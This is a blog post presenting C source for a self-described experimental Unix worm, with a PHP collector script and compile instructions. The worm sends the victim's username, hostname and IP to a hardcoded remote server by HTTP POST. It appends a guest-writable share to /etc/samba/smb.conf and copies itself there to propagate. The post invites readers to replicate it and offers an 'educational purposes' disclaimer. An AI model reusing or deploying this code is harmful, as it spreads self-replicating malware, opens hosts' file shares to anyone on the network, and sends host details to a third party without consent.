Today, in my bored state of mind, my thoughts stumbled upon the concept of a *nix worm. So, I decided to give it a try and some experimental stuff. I wanted my little project to be something simple and interesting in the same time.The particularity that differentiates a worm from other types of malware is the fact that it can propagate in the wild. So, in our case, the propagation method will be the replication of the worm thru samba shares.
However the worm would need root access, to achieve this goal, I will not present the methods it could use to escalate his privileges.
Other feature that my experimental worm has, is the ability to send information about his host, like hostname and ip, to a remote site, using simple POST requests. This could be used by someone to track the worm's activity and spreading rate. It's improbable that these POST requests will be block, because of the highly permisive state regarding outgoing connections on port 80 on the most routers/firewalls.
In the code, you will notice, the use of libcurl library to make POST requests, the use of libc functions to get the information we want from the host, and some simple editing of the smb.conf file to make the /tmp/share directory available in the network.
(<> not shown for the librarys because of some stupid bug who considers what is between <> is a tag)
worm.c:
#include stdio.h
#include fcntl.h
#include unistd.h
#include curl/curl.h
#include sys/socket.h
#include netdb.h
int main()
{
FILE* fd;
CURL *curl;
CURLcode makeit;
struct hostent *he;
struct in_addr addr;
const char *ceva="\n[Test]\n\tcomment = teste\n\tpath = /tmp/share/\n;\twritable = yes\n;\tbrowseable= yes\n\tguest ok = yes\navailable = yes\nbrowsable = yes\npublic= yes\nwritable = yes";
char name[1000] = "user=";
char *user = getlogin();
char leg1[666]="&nume=";
char host[666];
gethostname(host,sizeof host);
char leg2[666]="&ip=";
he=gethostbyname(host);
strcat(name,user);
strcat(name,leg1);
strcat(name,host);
strcat(name,leg2);
strcat(name,inet_ntoa(*(struct in_addr*)he->h_addr));
curl = curl_easy_init();
if(curl){
curl_easy_setopt(curl,CURLOPT_URL,"http://192.168.0.103/post.php");
curl_easy_setopt(curl,CURLOPT_POSTFIELDS,name);
makeit = curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
system("mkdir /tmp/share");
fd = fopen("/etc/samba/smb.conf","a");
fprintf(fd,ceva);
system("cp worm /tmp/share");
fclose(fd);
return 0;
}
If you want to replicate and experiment yourself, make sure you modify the variables values accordingly to your situation.(for example, the site's url)
To compile it:
gcc -lcurl -o worm worm.c
And, the small php script on the remote site:
$var1=$_POST['user'];
$var2=$_POST['nume'];
$var3=$_POST['ip'];
$sdf=fopen("log.txt","a");
fwrite($sdf,$var1);
fwrite($sdf,"\n");
fwrite($sdf,$var2);
fwrite($sdf,"\n");
fwrite($sdf,$var3);
fwrite($sdf,"\n");
fclose($sdf);
which will write the data in the chmoded 777 log.txt file.
This is only a Proof of Concept, and experimental stuff, and is made for educational purposes.
Niciun comentariu:
Trimiteți un comentariu